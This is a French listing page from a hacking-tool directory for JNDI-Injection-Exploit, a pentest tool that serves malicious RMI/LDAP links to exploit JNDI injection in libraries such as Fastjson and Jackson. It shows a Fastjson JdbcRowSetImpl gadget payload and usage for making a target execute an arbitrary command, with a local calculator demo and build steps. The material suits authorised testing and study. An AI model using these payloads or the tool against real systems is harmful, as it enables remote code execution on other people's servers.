Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
JNDI-Injection-Exploit — Outil de test d'injection JNDI(Un outil qui génère des liens JNDI peut démarrer plusieurs serveurs pour exploiter la vulnérabilité d'injection JNDI, comme Jackson, Fastjson, etc) | Kitploit
Outils/GitHubGitHub/welk1n/jndi-injection-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications Web
GitHubwelk1n/jndi-injection-exploit

JNDI-Injection-Exploit

Outil de test d'injection JNDI(Un outil qui génère des liens JNDI peut démarrer plusieurs serveurs pour exploiter la vulnérabilité d'injection JNDI, comme Jackson, Fastjson, etc)

Voir le dépôt
2.8k730il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

JNDI-Injection-Exploit

Documents sur l'injection JNDI

中文文档

相关文章

Description

JNDI-Injection-Exploit est un outil pour générer des liens JNDI fonctionnels et fournir des services d'arrière-plan en démarrant un serveur RMI, un serveur LDAP et un serveur HTTP. Les serveurs RMI et LDAP sont basés sur marshalsec et modifiés pour se connecter au serveur HTTP.

L'utilisation de cet outil vous permet d'obtenir des liens JNDI que vous pouvez insérer dans votre POC pour tester la vulnérabilité.

Par exemple, voici un vul-poc Fastjson :

root@kitploit:~
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}

Nous pouvons remplacer "rmi://127.0.0.1:1099/Object" par le lien généré par JNDI-Injection-Exploit pour tester la vulnérabilité.

Avertissement

Toutes les informations et le code sont fournis uniquement à des fins éducatives et/ou pour tester vos propres systèmes contre ces vulnérabilités.

Utilisation

Exécutez comme

root@kitploit:~
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [commande] [-A] [adresse]

où :

  • -C - commande exécutée dans le classfile distant.

    (optionnelle, la commande par défaut est "open /Applications/Calculator.app")

  • -A - l'adresse de votre serveur, peut être une adresse IP ou un domaine.

    (optionnelle, l'adresse par défaut est la première adresse d'interface réseau)

Points d'attention :

  • assurez-vous que les ports de votre serveur (1099, 1389, 8180) sont disponibles.

    ou vous pouvez changer le port par défaut dans la classe run.ServerStart lignes 26~28.

  • votre commande est passée à Runtime.getRuntime().exec() en tant que paramètres,

    vous devez donc vous assurer que votre commande fonctionne dans la méthode exec().

    Les commandes bash comme "bash -c ...." nécessitent des guillemets doubles.

Exemples

Démo locale :

  1. Lancez l'outil comme ceci :

    root@kitploit:~
    $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"
    

    Capture d'écran :

    image-20191018154346759

  2. Supposons que nous injections les liens JNDI comme rmi://ADDRESS/jfxllc générés à l'étape 1 dans une application vulnérable pouvant être attaquée par injection JNDI.

    Dans cet exemple, cela ressemble à ceci :

    root@kitploit:~
    public static void main(String[] args) throws Exception{
        InitialContext ctx = new InitialContext();
        ctx.lookup("rmi://127.0.0.1/fgf4fp");
    }
    

    puis, lorsque nous exécutons ce code, la commande sera exécutée,

    et le journal sera affiché dans le terminal :

    image-20191018154515787

Installation

Nous pouvons sélectionner l'une des deux méthodes pour obtenir le jar.

  1. Téléchargez le dernier jar depuis Realease.

  2. Clonez le code source en local et construisez (nécessite Java 1.8+ et Maven 3.x+).

    root@kitploit:~
    $ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
    
    root@kitploit:~
    $ cd JNDI-Injection-Exploit
    
    root@kitploit:~
    $ mvn clean package -DskipTests
    

À faire

  • (Fait) Combiner ce projet et JNDI-Injection-Bypass pour générer des liens fonctionnels lorsque trustURLCodebase est false dans les versions supérieures de JDK par défaut.
  • … ...
Télécharger l’outil